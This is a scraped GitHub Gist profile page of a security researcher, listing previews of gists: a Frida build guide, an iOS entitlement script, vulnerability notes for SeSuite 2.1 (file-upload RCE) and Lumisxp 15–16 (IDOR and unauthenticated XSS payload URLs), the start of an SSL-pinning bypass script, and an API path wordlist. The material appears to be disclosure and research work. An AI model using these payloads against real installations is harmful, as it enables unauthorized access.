Skip to content

Instantly share code, notes, and snippets.

View rodnt's full-sized avatar
:shipit:
see no evil ~ learning..

Rodolfo Tavares - (opcod3r) rodnt

:shipit:
see no evil ~ learning..
48 followers · 133 following
View GitHub Profile
@rodnt
rodnt / How-to-build-frida-server-for-ios.md
Created June 5, 2024 11:24 — forked from miticollo/How-to-build-frida-server-for-ios.md
How to build frida server for iOS jailbroken devices

Here, I'll show you how to compile Frida for both rootfull and rootless jailbreaks.

TL;DR

On Dopamine/Fugu15 Max or palera1n you can add my repo (open the link in your favorite browser on your jailbroken iDevice).

The DEBs you will install are build using the following instructions.

Update 2024-02-29

@rodnt
rodnt / fixPerm.sh
Created May 25, 2024 17:37
Fix iOS binary entitlements/access for "Operation not permitted"
#!/bin/bash
# Author: 0xz41 feat Shoaloak
# Description: Fix iOS binary entitlements/access for "Operation not permitted"
ENTITLEMENT="com.apple.private.security.container-manager"
binaries=(
"sh" "bash" "zsh" "dash"
"ls" "cat" "find" "cp" "mv"
"rm" "mkdir" "rmdir" "touch"
"file" "ln" "du" "scp"
@rodnt
rodnt / SeSuite.md
Last active June 12, 2024 15:18
Exploit Softexpert version 2.1 RCE

Description

SeSuite Version 2.1 is vulnerable to command execution via the upload of a malicious file at the form/efms_exec_html/file_upload_parser.php endpoint.

Request

  • Malicious file upload
POST /se/v54285/form/efms_exec_html/file_upload_parser.php HTTP/2
@rodnt
rodnt / idor-lumis.md
Last active June 12, 2024 14:53
IDOR Lumisxp 15.0.x <= 16.1.x

Description

Lumisxp versions 15.0.x to 16.1.x contain a GUID that can be exploited to access internal components without authorization.

Payload

  • URL: 
    /main.jsp?lumChannelId=00000000F00000000000000000000002&lumPageId=LumisBlankPage&lumRTI=lumis.service.doui.selectstructureelement.selectPage&pageId=
@rodnt
rodnt / xss3-lumisxp.md
Last active June 12, 2024 14:50
Unauthenticated XSS Lumisxp 15.0.x <= 16.1.x pageId parameter

Description

Lumisxp versions 15.0.x to 16.1.x have an unauthenticated XSS vulnerability in the pageId parameter.

Request

  • Payload: 
    GET /main.jsp?lumChannelId=00000000F00000000000000000000002&lumPageId=LumisBlankPage&lumRTI=lumis.service.doui.selectstructureelement.selectPage&pageId=%22%2c%20print()%2c%0d%22aaa
@rodnt
rodnt / xss2-lumisxp.md
Last active June 12, 2024 15:02
Unauthenticated XSS Lumisxp 15.0.x <= 16.1.x UrlAccessibilityEvaluation.jsp

Description

Lumisxp versions 15.0.x to 16.1.x have an unauthenticated XSS vulnerability in the UrlAccessibilityEvaluation.jsp page, specifically in the contentHtml parameter.

Request

  • Payload:

GET /lumis/service/htmlevaluation/UrlAccessibilityEvaluation.jsp?contentHtml=%3cp%3e%3ci%20id%3d%22run-code-button%22%20lang%3d%22xml%22%20title%3d%22Run%20Code%20and%20See%20Output%22%3e%3c%2fi%3e%3c%2fp%3e%0a%0a%3cp%3e%3ci%20title%3d%22Light%20Mode%22%3e%3c%2fi%3e%3c%2fp%3e%0a%0a%3ctable%20border%3d%220%22%20cellpadding%3d%220%22%20cellspacing%3d%220mmdfn%26lt%3bscript%26gt%3balert(1)%26lt%3b%2fscript%26gt

@rodnt
rodnt / xss-lumisxp.md
Last active June 12, 2024 15:09
Unauthenticated XSS Lumisxp 15.0.x <= 16.1.x XsltResultControllerHtml.jsp

Description

Lumisxp versions 15.0.x to 16.1.x have an unauthenticated XSS vulnerability in the XsltResultControllerHtml.jsp page, specifically in the lumPageId parameter.

Request

Payload:

  • GET request:
@rodnt
rodnt / mixunpinv2.js
Created December 26, 2023 19:47
Bypass Common SSL Pinning Android
/**
* by rodnt
* twitter: 0xrodnt
* Github: rodnt
*/
const config = {
flutterPatterns: {
android: "F? 0F 1C F8 F? 5? 01 A9 F? 5? 02 A9 F? ?? 03 A9 ?? ?? ?? ?? 68 1A 40 F9"
},
@rodnt
rodnt / paths.txt
Created December 5, 2023 17:18
Common api paths.. swagger..openapi..
/swagger-ui.html
/swagger-ui/
/swagger-ui/index.html
/api-docs
/v2/api-docs
/v3/api-docs
/swagger.json
/openapi.json
/api/swagger.json
/docs
@rodnt
rodnt / win11Pendrive.sh
Created December 2, 2023 10:20
Windows 11 bootable pendrive script
#!/bin/bash
# Function to select the USB device
select_usb_device() {
echo "Available USB devices:"
local devices=(/dev/sd*)
select usb_device in "${devices[@]}"; do
if [ -z "$usb_device" ]; then
echo "Invalid selection, please try again."
else